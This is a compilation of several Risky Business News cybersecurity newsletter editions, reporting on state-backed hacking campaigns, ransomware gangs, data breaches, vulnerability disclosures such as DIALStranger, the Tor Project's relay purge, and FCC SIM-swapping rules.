Another DPRK supply chain attack: A North Korean hacking group has carried out a supply chain attack using the infrastructure of CyberLink, a Taiwanese company that develops multimedia software products. Tracked as Diamond Sleet (Zinc, Temp.Hermit, Labyrinth Chollima), the group hid the LambLoad malware in the company's legitimate applications. The incident took place at the end of October and had limited impact. Microsoft says the malicious activity only impacted around 100 devices across the world, with most victims in Japan, Taiwan, Canada, and the US.
Kimsuky alert: The South Korean National Police Agency (KNPA) has published a security alert warning of a Kimsuky spear-phishing campaign impersonating government and news media organizations. More than 1,400 users have received emails so far, according to officials.
Russian disinfo: Israeli news site Haaretz has found a cluster of Kremlin-run accounts pushing disinformation about the Israel-Hamas war. The campaign included antisemitic graffiti painted by foreign actors in Paris and fake news stories in various languages.
Vulnerabilities, security research, and bug bounty
Windows Hello bypass: Security researchers from Blackwing Intelligence have bypassed Windows Hello fingerprint authentication on Dell Inspiron, Lenovo ThinkPad, and Microsoft Surface Pro laptops. The researchers targeted the Secure Device Connection Protocol (SDCP) and how device manufacturers implemented the protocol. Blackwing says that while Microsoft did a "good job" at designing some parts of the SDCP, two of the vendors they tested didn't even enable it. The research was sponsored by Microsoft's MORSE security team and aimed to test the security of the top three fingerprint sensors used for Windows Hello authentication.
InfStones vulnerability: Blockchain security firm dWallet Labs has disclosed a vulnerability in blockchain infrastructure provided by InfStones. According to dWallet Labs, an attacker who exploits the vulnerability can take over servers and extract the private keys of validators hosted on InfStones infrastructure. Researchers say the vulnerability impacts transaction validators for different blockchains, such as ETH, BNB, SUI, APT, and others.
WordPress admin password reset bug: Wordfence has discovered a vulnerability in the UserPro WordPress plugin that can let attackers reset an admin account's password.
ActiveMQ vulnerability: PRIOn security researchers have published an analysis of CVE-2023-46604, an actively exploited vulnerability in Apache ActiveMQ servers.
OpenCMS vulnerabilities: watchTowr Labs has published a write-up on four vulnerabilities in the OpenCMS platform that got patched at the end of October.
Kubernetes security updates: The Kubernetes project has released a security update to fix a privilege escalation on Container-Optimized OS and Ubuntu nodes.
NCSC challenge coins: The UK NCSC plans to provide special challenge coins (pictured below) to the top security researchers who reported vulnerabilities in UK government sites via the NCSC's bug bounty program.
Infosec industry
SAINTCON 2023 videos: Talks from the BlueHat 2023 security conference, which took place in October, are available on YouTube.
Buggy Fortinet alerts: Fortinet alerts for its monthly security updates are not DMARC-signed and are getting sent to spam folders. Someone at Fortinet might wanna look into that.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how being more open about cybersecurity threats is great for marketing and has also forced cybersecurity companies to pick sides and make value judgements.
This newsletter is brought to you by Yubico. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Spotify:
The Tor Project has removed an estimated 1,000 relay servers from its network, citing their involvement with a for-profit cryptocurrency scheme.
The scheme allegedly promised cryptocurrency tokens for users who set up and ran Tor relays.
In a blog post on Monday, Tor admins said they removed participating servers to protect the integrity and reputation of their project. The removal was subject to a community vote that passed last week.
While the number of removed servers was not disclosed, metrics for the Tor network show a drop of almost 1,000 active relays over the past week.
The Tor Project expressed its disapproval of the scheme and warned relay operators of the danger such schemes pose to both node operators and their users.
The project said it had worked on its own in-house monetization schemes in the past to help support its operations and operators, but none have offered an adequate level of protection so far.
The Tor Project did not provide details about the cryptocurrency scheme, but it was most likely referring to the ATOR cryptocurrency project that launched at the end of September. The ATOR token lost 58% of its value after the Tor Project's announcement.
Over the years, the Tor Project has been on a quest to diversify its revenue streams, which have been historically tied to the US Department of Defense.
The project's main financial success has been to reduce the percentage of US government funding from 85% in 2015 to around 50%, a figure Tor has been hanging around since 2018, and going as low as 38% in 2021.
This year, in a financial report released last week, the Tor Project reported that 53% of its funding in fiscal year 2021-2022 came from the US government, a figure larger than usual after a significant fall in user donations last year.
Breaches, hacks, and security incidents
NTT leak: A former employee of Japanese telco NTT stole and leaked the personal information of 9 million of the company's customers. The employee took the data from an NTT call center server and sold it to local data brokers. The theft took place in April 2022 and remained undetected until July this year, when Japanese police discovered the data as part of its investigations. NTT confirmed the breach in October and blamed it on one of its telemarketing operators. [Additional coverage in The Asahi Shimbun]
AutoZone in the MOVEit zone: Auto parts retail chain AutoZone says the data of almost 185,000 customers was stolen in a cyberattack at the end of May. The data was stolen by the Clop cybercrime group as part of its attacks that targeted MOVEit file-sharing servers. More than 2,600 companies across the world have been impacted by the MOVEit hacks, and the data of 77 million users was stolen in the intrusions.
Call for no more ransom payments: The CEOs of five Canadian hospitals that have been hacked by ransomware gangs are calling for the government to pass a formal ban on ransom payments. The hospital execs are urging the government to follow through on their promise made during the recent International Counter Ransomware summit. Canada and 49 other countries pledged to stop paying ransoms to hackers as a way to cut off their funding. The five CEOs manage five hospitals in the Ontario region that got hit by ransomware at the end of October and decided not to pay to avoid "feeding the monster." [Addition coverage in iHeartRadio] [h/t Brett Callow]
Russian pilot hack: Pro-Ukrainian hacktivist group Cyber Resistance has hacked and leaked data from the email account of a Russian pilot employed by Aviacon Zitotrans, a sanctioned Russian airline. The leaked emails allegedly show how Russian airlines are secretly moving weapons, ammunition, and sanctioned goods from Iran, South Africa, and Mali to Russia. In some cases, the transports are disguised as "humanitarian aid," the group says. The Cyber Resistance group has a history of hacking and exposing Russian operations. They previously doxxed Russian pilots who bombed civilian infrastructure in Ukraine, doxxed the leader of the APT28 cyber-espionage group, and exposed Russia's efforts to recruit Cuban mercenaries. [Additional coverage in InformNapalm]
General tech and privacy
Nothing Chats fiasco: Tech company Nothing has pulled its Nothing Chats instant messaging app from the Google Play Store a day after its launch. Advertised as an E2EE messenger that brings support for iMessage on Android devices, the app was pulled after security researchers discovered egregious privacy issues. Researchers found the app was logging into users' accounts on their behalf and redirecting and logging all messages through its own servers. They also found the app was using HTTP for many of its most sensitive requests. [Additional coverage in The Verge]
Twitter FTC investigation: The FTC is investigating Twitter for running unlabeled ads on its platform. [Additional coverage in TechCrunch]
YouTube intentionally slows down traffic: Google is intentionally slowing down YouTube page loads for browser users who use an ad-blocker. The delay is not present for Chrome users with an ad-blocker but only for other browsers that use an ad-blocker. Totally not monopolistic behavior. Nope. You're seeing things! [Additional coverage in Android Authority]
FreeBSD 14: Version 14.0 of the FreeBSD operating system is out.
Government, politics, and policy
Ukraine sacks cybersecurity officials: The Ukrainian government has fired two cybersecurity officials amid an investigation into alleged embezzlement. Yurii Shchyhol and Victor Zhora were accused of participating in a scheme to contract software at inflated prices. The two served as the head and deputy of the State Service of Special Communications and Information Protection of Ukraine (SSSCIP). Four other suspects are also under investigation. The group is accused of embezzling $1.7 million from government contracts. [Additional coverage in Cyberscoop]
Europol OSINT task force: Europol has set up a special OSINT task force that will support investigations into war crimes committed in the Russian-Ukrainian war.
Poland to investigate Pegasus cases: The newly elected Polish government will establish a special commission next week to investigate the former government's use of the Pegasus spyware. The commission will look at how the former ruling party PiS used Pegasus to spy on opposition members, journalists, and prosecutors. Reuters reported at the end of October that the government was looking at establishing the commission. [Additional coverage in PAP] [h/t Eva Infeld]
Australia's Cyber Health Check Program: The Australian government is setting up a voluntary cyber health check program for small and medium businesses. The program will allow SMBs to take a free security assessment and access training materials to upskill their employees. SMBs with a higher risk of being targeted by hackers will be able to request a more sophisticated, third-party security assessment. The Australian government is putting $7.2 million into the new program. [Additional coverage in The Canberra Times]
Hemisphere program: US Senator Ron Wyden (D-Ore) has asked the Justice Department to release information about its secret Hemisphere phone surveillance program. The program allows US law enforcement agencies to request searches of US phone records without warrants. The searches are run against an AT&T database of phone records going as far back as 1987. AT&T is allegedly getting paid to provide access to the database and run the Hemisphere platform. The program is not classified, but the DOJ has marked it as "Law Enforcement Sensitive." Sen. Wyden is now asking the DOJ to remove the classification and release Hemisphere documents to the public. [Additional coverage in Wired]
DOD info-op strategy: The US Department of Defence has published its strategy for information operations. On the same note, the US Air Force cyber command also announced plans to devote more time to training airmen in information warfare.
US-ID cyber agreement: The US and Indonesia have signed a defense agreement that includes a significant focus on cyber and space capabilities. [Additional coverage in DefenseOne]
CISA pilot program: CISA has launched a pilot program that will provide what the agency describes as "cutting-edge cybersecurity shared services" to selected US critical sector organizations. The pilot program launched in October with its first phase, with participants from the healthcare, water, and K-12 education sectors. CISA Executive Assistant Director for Cybersecurity Eric Goldstein says the agency plans to enroll up to 100 entities by the end of the year. [Additional coverage in The Record]
GridEx VII: Over 250 organizations take part in GridEx VII, a biennial exercise focusing on the security of the electrical grid in the United States and Canada. [Additional coverage in SecurityWeek]
ICO cookie crackdown: UK privacy watchdog ICO has warned organizations about an impending crackdown if they don't simplify their cookie banners. The agency had previously requested that websites provide an easy way to reject all advertising cookies. The ICO has given the largest visited sites in the UK 30 days to comply with its new rules or face punishment.
IoC RFC: The UK's cybersecurity agency—the NCSC—has filed a formal document with the Internet Engineering Task Force looking to standardize IoC formats. Also known as Indicators of Compromise, IoCs are used by cybersecurity tools and professionals to detect malicious activity and can take the form of domain names, IP addresses, or hashes. The NCSC says the new document introduces a common format for sharing and using IoCs to improve interoperability between different vendors. The agency says it's been working on the IoC standard for the past three years. The IETF has assigned RFC9424 for the proposed standard, which is now entering a public comments period before a voting process.
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Derek Hanson, Yubico VP of Solutions Architecture and Alliances, about the state of authentication and what Passkeys are all about.
Cybercrime and threat intel
Cryptocurrency seizure: The US Department of Justice has seized almost $9 million worth of Tether cryptocurrency from a cybercriminal organization. The DOJ says the group obtained the money after exploiting over 70 victims through romance scams and cryptocurrency confidence scams. Officials did not name or charge any of the group's members.
DraftKings hacker pleads guilty: A 19-year-old from Wisconsin has pleaded guilty to hacking-related charges in connection to a credential-stuffing attack against sports betting website DraftKings. Joseph Garrison admitted to successfully breaching more than 60,000 DraftKings accounts in an attack in November 2022. Officials say Garrison sold access to some accounts online and also stole $600,000 from around 1,600 of the site's users. Garrison is scheduled for sentencing in January 2024.
LockBit has new ransom negotiation rules: The LockBit ransomware operation has announced new rules for its affiliates during the ransom negotiation process. The new rules entered into effect at the start of October. LockBit admins imposed the rules after they saw affiliates requesting small ransoms from victims and giving out generous discounts. According to researchers at Analyst1, affiliates will now be forced to use a tiered percentage-based system for ransom fees, depending on the victim's annual revenue (see below). Affiliates are now also banned from offering discounts greater than 50% of the initial ransom demand.
companies with revenue up to $100 million pay from 3% to 10%
companies with revenue up to $1 billion pay from 0.5% to 5%
companies with revenue of more than $1 billion pay from 0.1% to 3%
vx-underground ransomware: The Phobos RaaS has created a version of their ransomware that poses as vx-underground, a well-known threat intelligence sharing group.
Play goes RaaS: Security firm Adlumin says it found evidence that the Play ransomware gang is now advertising access to its malware via a Ransomware-as-a-Service model.
INC ransomware: Cybereason has published a threat alert on INC, a new ransomware operation that surfaced in August this year.
"All known victims are exclusively from Western countries with the majority of them from the United States and Europe (a single victim was from Singapore)."
Linux-v-Windows ransomware: Check Point has published a comparative look at the Linux and Windows ransomware scenes, and how ransomware gangs/strains operate on each platform.
Android bankers in India: Microsoft's threat intel team has published a technical report about the tactics of various cybercrime gangs that use socially-engineered SMS, Telegram, or WhatsApp messages to get victims to install malware-laced Android apps on their devices. The final payload is typically one of the new-age hybrid info-stealing RAT strains that have been growing in popularity in recent years.
Kubernetes leaks: Aqua Security says it found Kubernetes secrets of hundreds of organizations and open-source projects exposed on the internet.
"Among the companies were SAP's Artifacts management system with over 95 million, two top blockchain companies, and various other Fortune-500 companies. These encoded Kubernetes configuration secrets were uploaded to public repositories."
Hydra dark web market analysis: A team of US academics has published a detailed analysis of Hydra, the largest dark web marketplace seen so far. The research comes with this interesting table showing annual revenue estimates for the largest dark web markets of the last decade.
Malware technical reports
NetSupport RAT: Threat actors have repurposed the NetSupport Manager legitimate app into a fully-fledged remote access trojan, currently tracked as NetSupport RAT.
Agent Tesla: A new variant of the Agent Tesla infostealer has been spotted in the wild.
SolarMarker: eSentire researchers have published an analysis of SolarMarker, a .NET infostealer also known as Jupyter.
LummaC2 Stealer: Security firm Outpost24 has found a version of the LummaC2 Stealer that uses an extremely clever way of detecting sandbox environments. The malware records mouse cursor positions and then uses trigonometry functions to detect if the cursor movement is the result of natural human interaction or if the mouse was moved using pre-determined algorithms, typically used by sandboxed environments.
Kinsing: Trend Micro has seen the Kinsing crypto-mining botnet exploit Apache ActiveMQ servers using the recently patched CVE-2023-46604 vulnerability to install their crypto-mining bot.
Crypto-miner: AhnLab looks at a crypto-mining campaign targeting Windows systems running Apache web servers.XWorm: ANY.RUN researchers have published a deep dive into C2 protocol of the XWorm malware.
DarkGate: Sekoia researchers have published an analysis of the DarkGate loader, advertised as a go-to replacement for the now defunct QakBot malware—disrupted by the FBI earlier this year.
"After examining the various DarkGate stages (the AutoIT script, its shellcode and also its core), it becomes evident that DarkGate represents a significant threat. Consequently, it is imperative to maintain continuous tracking and monitoring of DarkGate in both the short and long term."
Sponsor Section
Brought to you by Yubico, the inventor of the YubiKey, a security key that provides the gold standard for multi-factor authentication (MFA) and stops account takeovers in their tracks. Find them at yubico.com
APTs, cyber-espionage, and info-ops
Andariel: Security researchers at AhnLab say the Andariel North Korean hacking group is targeting South Korean organizations through a local asset management program. Hackers are using vulnerabilities in the software to deploy malware on victims' internal networks. AhnLab did not name the vendor. The same group was also seen targeting MSSQL database servers.
Konni: Fortinet's security team looks at a recent Konni campaign targeting Russian entities with malicious Word documents.
North Korean campaigns: PAN's Unit42 has found two job-themed social engineering campaigns that bear the hallmarks of your typical DPRK operation. Unit42 named the campaigns Contagious Interview and Wagemole. Per Unit42, "activity from both campaigns remains an ongoing active threat."
Vulnerabilities, security research, and bug bounty
CitrixBleed reminder: Citrix has published a blog post to remind owners of NetScaler and ADC appliances to not only update its software but also wipe past user sessions. This step is necessary because threat actors who exploit the CitrixBleed vulnerability will steal authentication tokens that they can use later after the device has been patched. A day after the company's blog post, CISA and the FBI also released a security advisory on how the LockBit ransomware gang is exploiting the CitrixBleed vulnerability. The advisory contained IOCs shared by Boeing, one of the LockBit gang's recent victims.
"This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organization."
Kubernetes security updates: The Kubernetes project has released a security update to fix a privilege escalation on Container-Optimized OS and Ubuntu nodes.
WithSecure Elements vulnerability: Baldur researchers have discovered a DoS vulnerability in the WithSecure Elements cloud-based security solution.
MSFT bug bounty program: Microsoft has awarded more than $63 million in rewards to the security researchers who participated in its bug bounty program over the past decade. Launched in 2013, the Microsoft bug bounty program has turned ten years old this year. Microsoft says the program has grown from less than 100 bug reports in its first year to include 22 different bug bounty programs for various Microsoft platforms, with thousands of submissions each year. The latest of these programs is the Microsoft Defender Bounty Program, which the company launched this week. The program will provide rewards of up to $20,000 for vulnerabilities in the Microsoft Defender line of products.
Infosec industry
SAINTCON 2023 videos: Talks from the SAINTCON 2023 security conference, which took place in October, are available on YouTube.
Retaliation at work: A recent Engprax survey of almost 2,000 software engineers found that 53% of respondents witnessed or suspected wrongdoing in their workplace. Of those who spoke up, 75% reported facing retaliation after they reported wrongdoing to their employers. Those who didn't report anything cited fear of retaliation as the primary reason.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how being more open about cybersecurity threats is great for marketing and has also forced cybersecurity companies to pick sides and make value judgements.
This newsletter is brought to you by Yubico. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Turkish security researcher Yunus Çadirci has discovered vulnerabilities in the DIAL protocol and misconfigurations in vendor equipment that can be used to force TVs and other capable devices into forcibly playing an attacker's video content.
The vulnerabilities have been collectively named DIALStranger, and details about the flaws were disclosed for the first time at the Black Hat Middle East and Africa security conference last week.
The DIALStranger flaws were discovered way back in 2019, but Çadirci kept the original report private for four years as the protocol received patches and vendors slowly updated devices.
The flaws impact Discovery and Launch—or DIAL—a protocol primarily co-developed by Netflix and YouTube, with help from Sony and Samsung.
It's a protocol that merges SSDP, UPnP, and HTTP. It is designed to operate on local subnets to allow devices to discover each other. Its primary audience is multimedia device vendors, as DIAL can allow "second screen" devices, such as a smartphone or tablet, to send and play content on "first screen" devices, such as a smart TV, set-top box, or PC.
Back in 2019, Çadirci says he discovered that the DIAL protocol did not have any kind of authentication or strong security mechanisms put in place.
He found that "first screen" devices were exposing a web server URL where "second screen" devices could send playback instructions.
If the "first screen" device was exposed on the internet, anyone could send commands to these endpoints and play any video stream they wanted without any sort of authentication or pairing needed.
At the time, Çadirci says he found "thousands of devices connected to [the] Internet directly that can be controlled by attackers" and that some attacks on devices in local networks were also possible.
Screenshot of one of the DIALStranger demos
Çadirci says that Netflix updated the protocol in 2020 to cover some of the DIALStranger issues, while some vendors either moved away from DIAL or slowly released firmware updates or new devices with a better version of the protocol.
The researcher didn't provide a full list of vulnerable devices, but his PoCs successfully exploited an Xbox One console and smart TVs from Phillips, LG, Vestel, and Samsung.
A scanning script is available for further testing.
The vulnerability's name comes from Çadirci's previous work on CallStranger, a vulnerability in the UPnP protocol that could be abused to bypass security features on IoT devices and abuse them for DDoS attacks.
Obviously, DIALStranger is not an internet-breaking flaw, but anything that can be used for mass-rickrolling is a DEFCON 1 threat level to me.
Breaches, hacks, and security incidents
Canadian government data breach: The Canadian government says that cybersecurity breaches at two of its contractors have exposed the information of government employees. The breaches took place in mid-October and impacted Brookfield Global Relocation Services and SIRVA Worldwide Relocation & Moving Services, two companies that provide relocation services for government employees. Affected individuals include RCMP police forces, military staff, and public servants, going as far back as 1999. The LockBit ransomware gang already took credit for the BGRS attack.
Long Beach cyberattack: The city of Long Beach in California has shut down its IT systems after it suffered a cybersecurity incident on Tuesday. Officials say the incident did not impact public city services.
Postmeds breach: Postmeds, the company behind the Truepill pharmacy prescription fulfilling service, has disclosed a security breach. The data of more than 2.3 million Americans is believed to have been impacted. [Additional coverage in TechCrunch]
dYdX cyber-heist: A threat actor exploited the dYdX cryptocurrency platform to steal $9 million worth of crypto-assets from the company's wallets. A member of the dYdX team described the incident as a price manipulation attack.
Kronos Research cyber-heist: A threat actor stole almost $26 million worth of crypto assets from the Kronos Research trading platform. The Taiwanese company says the hack took place after the attacker gained access to some of its platform's API keys. Kronos says the hack will not jeopardize its operations, and the stolen funds only represent a small portion of its assets. [Additional coverage in The Block]
Poloniex (allegedly) identifies hacker: The Poloniex cryptocurrency exchange has allegedly learned the real-world identity of the hacker who breached its platform and stole $130 million earlier this month. In a message attached to a blockchain transaction, the company has given the hacker until November 25 to return all the stolen funds. The company says if the hacker doesn't comply, they will file charges with law enforcement in China, Russia, and the US. Poloniex has also offered to allow the hacker to keep $10 million as a "white hat reward" in an attempt to entice the hacker to return its funds.
General tech and privacy
iPhone RCS support: Support for the new RCS messaging standard will arrive on iPhones next year. [Additional coverage in 9to5Mac]
Chrome Mv2 phase-out: Google has resumed plans to phase out Manifest V2, the codebase on which most current Chrome extensions are running. Extension developers should look into porting their code to the new Manifest V3 API.
"We will begin disabling Manifest V2 extensions in pre-stable versions of Chrome (Dev, Canary, and Beta) as early as June 2024, in Chrome 127 and later. Users impacted by the rollout will see Manifest V2 extensions automatically disabled in their browser and will no longer be able to install Manifest V2 extensions from the Chrome Web Store. [...] We expect it will take at least a month to observe and stabilize the changes in pre-stable before expanding the rollout to stable channel Chrome, where it will also gradually roll out over time."
Ad-blocking company AdGuard, which has been one of the Mv3's biggest critics, has now toned down its criticism.
Twitter loses advertisers: More than a dozen of the world's largest advertisers have pulled their ads off Twitter after the platform's owner boosted some braindead antisemitic conspiracy theories. Companies that left Twitter include Apple, Sony, Disney, Lionsgate, Paramount, Comcast, Warner Bros, and IBM. [Additional coverage in Deadline]
Tor finances: The Tor Project has published its financial report for fiscal year 2021-2022. As in previous years, the US government still remains the project's main donor.
Government, politics, and policy
Russian internet censorship: The Russian government has granted permission to telecommunications watchdog Roskomnadzor to block access to websites that contain information about circumventing Internet censorship. The ban would primarily impact websites that provide instructions on how to use a VPN. After Russia's invasion of Ukraine, the Rosomnadzor's blocklist has reached a mammoth size of 885,000 URLs. [Additional coverage in Meduza]
New acting national cyber director: The White House has appointed Drenan Dudley as the new White House acting national cyber director while nominee Harry Coker is going through his Senate confirmation process. [Additional coverage in Cyberscoop]
New CISA guide: CISA has released a security mitigation guide for organizations in the healthcare and public health sectors.
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Derek Hanson, Yubico VP of Solutions Architecture and Alliances, about the state of authentication and what Passkeys are all about.
Cybercrime and threat intel
Marriott hacker fakes his own death: The FBI has arrested a Kentucky man for hacking two contractors for the Marriott hotel chain, stealing guest data, and then selling it on a Russian hacking forum. Jesse Kipf of Somerset, Kentucky, was detained in July and formally charged at the start of November. The hacks took place in February and June this year and were not publicly disclosed, neither by Marriott nor its contractors. The FBI says Kipf also hacked several US state death certificate registration agencies and successfully faked his own death in both Hawaii and Vermont. It remains unclear why, but Forbes believes this was an attempt to hide his tracks and throw off investigators. [Additional coverage in Forbes/non-paywall]
Securolytics COO pleads guilty: The chief operating officer of cybersecurity firm Securolytics has pleaded guilty to hacking two hospitals in order to boost his company's business. Prosecutors say Vikas Singla hacked two hospitals in the cities of Duluth and Lawrenceville, Georgia, and then immediately started advertising his own company's cybersecurity services to other nearby hospitals. Singla's hacks disrupted phone and network printer services. His hacks and advertising scheme were discovered, and Singla was detained in 2021. As part of the plea deal, Singla has agreed to pay $818,000 in restitution to the two hacked hospitals. In return, prosecutors will ask the judge for 57 months of probation. [Additional coverage in Law360, GovInfoSecurity]
Israeli hacker-for-hire sentenced: A US judge has sentenced an Israeli private investigator to 80 months in prison for his role in organizing global hacking campaigns. Prosecutors say Aviram Azari made $4.8 million by acting as an intermediary between hacking groups and his customers. Azari organized campaigns that targeted climate change activists, and individuals and financial firms that had been a critical part of the German payment processing company Wirecard. The 80-month sentence is the halfway mark between the 100 months asked by the prosecution and the 60 months asked by Azari's legal team.
Dutch hacker helped drug traffickers: A Dutch man named Davy de Valk has hacked the container management systems in the Antwerp and Rotterdam ports to aid criminal cartels smuggle drugs and contraband into the EU. According to the Organized Crime and Corruption Reporting Project, de Valk provided data to cartels about the best containers for hiding contraband. He allegedly hacked the Antwerp port after bribing an employee into inserting a malware-infested USB in the terminal's network. His hacking spree began in 2020, and he provided crucial information to help smugglers pick up their goods on the receiving end. De Valk's story is part of the OCCRP's Narco Files, a collection of reports on how crime groups, and drug cartels specifically, are slowly taking over the world.
Patternz profile: The Irish Council of Civil Liberties says that an Israeli company named ISA Security is selling access to Patternz, a powerful surveillance tool. The ICCL says Patternz taps into real-time bidding information from online advertising platforms to provide customers the ability to track almost anyone around the world. ISA claims Patternz has data points for five billion individuals, including information on their driving routes, children, co-workers, and approximate geo-location. The ICCL warns the data on which Patternz is built freely flows through China and Russia and poses a danger to government, intelligence, and military staff in both the EU and the US.
New npm malware: Thirteen malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
State of cloud security: Cloud security firm Datadog has published its yearly report on the state of cloud security. The main conclusions are below.
Long-lived cloud credentials continue to be problematic and expose cloud identities.
Multi-factor authentication (MFA) is not always consistently enforced for cloud users.
Adoption of IMDSv2 in AWS is rising, though still insufficient.
Use of public access blocks on storage buckets varies across cloud platforms and is more prevalent in AWS than Azure.
A number of cloud workloads have non-administrator permissions that still allow them to access sensitive data or escalate their privileges.
Many virtual machines are exposed to the internet.
Malware technical reports
SharpLoader: A new version of the SharpLoader malware is now in the wild, distributing versions of the QasarRAT.
Serpent Stealer: ThreatMon has published a report on the new Serpent infostealer, also known as Serpent Stealer.
AlphV malvertising: An AlphV ransomware affiliate is using malicious Google ads to redirect users to enterprise apps laced with malware. Spotted by security firm eSentire, the ads target users searching for apps such as Slack, WinSCP, Advanced IP Scanner, and Cisco AnyConnect. These boobytrapped files contain a version of the Nitrogen backdoor, which the group will use to move laterally across networks and deploy its ransomware. eSentire says the campaign has been running since June. This seems to be the same campaign also spotted by Securonix and Trend Micro.
QazLocker ransomware: Acronis security researchers have published a deep dive into the new QazLocker ransomware. The blog post is the first in a series of write-ups the company plans to publish on currently active ransomware operations.
Rhysida ransomware: Fortinet researchers published an analysis of the Rhysida ransomware, also covered by CISA and the FBI last week here, too.
NoEscape ransomware: The same Fortinet team also looked at the NoEscape gang, a group seen recently employing DDoS attacks to pressure victims.
Phobos ransomware: Cisco Talos has published an in-depth analysis of the Phobos (aka Dharma) RaaS platform and its most active affiliate groups, one of which is an extortion group known as 8Base.
"We assess with moderate confidence Eking, Eight, Elbie, Devos and Faust are the most common Phobos variants, as they appeared most frequently across the samples we analyzed. We assess with moderate confidence that the Phobos ransomware is closely managed by a central authority, as there is only one private key capable of decryption for all campaigns we observed."
Sponsor Section
Brought to you by Yubico, the inventor of the YubiKey, a security key that provides the gold standard for multi-factor authentication (MFA) and stops account takeovers in their tracks. Find them at yubico.com
APTs, cyber-espionage, and info-ops
Stately Taurus: A Chinese APT group named Stately Taurus has launched an extensive cyber-espionage campaign against the Philippines government. The intrusions began in August after the Philippines announced joint navy patrols with the US and naval exercises with Australia. Palo Alto Networks says the group managed to compromise at least one government agency for five days in August.
SideCopy: ThreatMon has published a report on recent SideCopy operations that have used the AllaKore RAT for remote access.
Rattlesnake: QiAnXin has published a report on a Rattlesnake (Sidewinder) APT operation targeting South Asian countries with a Nim-based backdoor.
Gamaredon: Russian APT group Gamaredon is conducting a large-scale intelligence collection in Ukraine using a new USB worm named LitterDrifter. The worm's main purpose is to spread to as many systems as possible and then establish a connection from the newly infected host to a Gamaredon command-and-control server. In November 2021, the Ukrainian Security Service linked the Gamaredon group to the Crimean branch of the Russian Federal Security Service, also known as the FSB.
Vulnerabilities, security research, and bug bounty
Havoc C2 vulnerability: Security researcher Ali Beydoun has found a vulnerability in the Havoc C2 framework that can be used to crash C2 servers.
KEV tags on GreyNoise: The GreyNoise service now supports CISA KEV tags for easier threat hunting of actively exploited vulnerabilities, a useful feature for organizations with active threat intel teams and compliance requirements.
Splunk security updates: SIEM maker Splunk released security updates last week to fix seven vulnerabilities.
Infosec industry
New tool—.NetConfigLoader: Mr.Un1k0d3, a member of the RingZer0 CTF team, has published a list of .NET apps signed by Microsoft that can be used for EDR/AV evasion.
New tool—Porch Pirate: Security firm Mand Consulting Group has open-sourced a tool named Porch Pirate that can uncover secrets published to the Postman software development platform.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about International Humanitarian Law, aka the Rules of War in cyberspace. These rules don't really make sense in cyberspace, but despite that, Tom and The Grugq think talking about them (and other norms of behavior) is still worthwhile.
This newsletter is brought to you by Gigamon. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Spotify:
The US Federal Communications Commission (FCC) has adopted new rules designed to protect US consumers from SIM-swapping attacks and port-out scams.
Under the new rules, US wireless providers are required to use "secure methods of authenticating a customer" when they request porting a SIM card to a new device (aka SIM swapping) or their phone number to a new carrier (aka port-out).
The Commission did not specify what the "secure methods" should be, and it appears the agency is leaving this up to each of the US carriers and their own internal procedures.
In addition, the FCC says wireless carriers have to immediately notify customers when a SIM swap or port-out operation has been requested.
The Commission hopes the notification will help victims spot a malicious request when it takes place and prevent attackers from gaining control of a user's phone number.
Both SIM-swapping and port-outs have been extensively and repeatedly used by a wide range of threat actors to hijack access to a user's phone number.
Threat actors typically use this temporary access to request password resets for the victim's online accounts, change passwords, gain control of the accounts, and then steal bank or cryptocurrency assets.
Individuals who fell victim to SIM-swapping and port-out attacks range from regular nobodies who lost their cryptocurrency savings to former Twitter CEO Jack Dorsey, who had his account hijacked to promote links to various crypto-scams.
SIM-swapping and port-out scams have also been widely adopted by professional cybercrime and ransomware groups, which typically use them to hijack low-level employee accounts and then pivot to internal networks.
Two of the most prolific groups to do so are Lapsus$ and Scattered Spider, both of which have used SIM-swapping and port-outs as the core element of their intrusions.
Back in February 2022, the FBI put out a public service announcement warning about the rise of SIM swapping and these exact same scenarios, and in August this year, the DHS Cyber Safety Review Board asked both the FCC and the FTC "to mandate and standardize best practices to combat SIM swapping."
The FCC's new rules were first proposed in July and have been adopted after a period of public comments. The FCC has opened the newly passed rules for new public comments to give telcos a way to "further harmonize" the requirements if they need to.
Breaches, hacks, and security incidents
NTMC leak: Bangladesh intelligence agency NTMC has left a sensitive database exposed on the internet and leaked the personal details of an unknown number of citizens. The leaked data contained more than 120 data points for each citizen, ranging from real names to Twitter IDs, criminal records, and phone call records. Discovered by Viktor Markopoulos of CloudDefense.AI, the researcher says he reported the database to Bangladesh officials, but the server was never secured. Instead, it was wiped and replaced with a ransom demand, presumably in an automated attack. [Additional coverage in Wired/non-paywall]
Ransomware gang reports victim to SEC: The AlphV ransomware gang has reported one of its victims to the US Securities and Exchange Commission for failing to report its security breach via a 10-K form. The reported company is MeridianLink, a digital lending service provider for the financial industry. MeridianLink has confirmed the incident but has not commented on AlphV's actions. [Additional coverage in DataBreaches.net]
Toyota ransomware incident: Japanese carmaker Toyota has confirmed that a ransomware group breached its financial services division and is now threatening to leak stolen documents on the dark web. The company confirmed the hack after the Medusa ransomware gang listed Toyota on its leak site, demanding a $8 million payment. The breach allegedly took place at Toyota's financial division in Germany. [Additional coverage in BleepingComputer]
General tech and privacy
ETSI open-sources TETRA code: ETSI, the organization behind the TETRA communications protocol, has decided to open-source the code behind its protocols and algorithms after researchers found a series of backdoors in its code in July this year. [Additional coverage in Zero Day]
New protestware: Researchers at DevSecOps company ReversingLabs have discovered new protestware packages on the npm portal containing messages of peace related to the conflicts in Ukraine, Israel, and the Gaza Strip. One of these is owned by Israeli DevSecOps company Snyk.
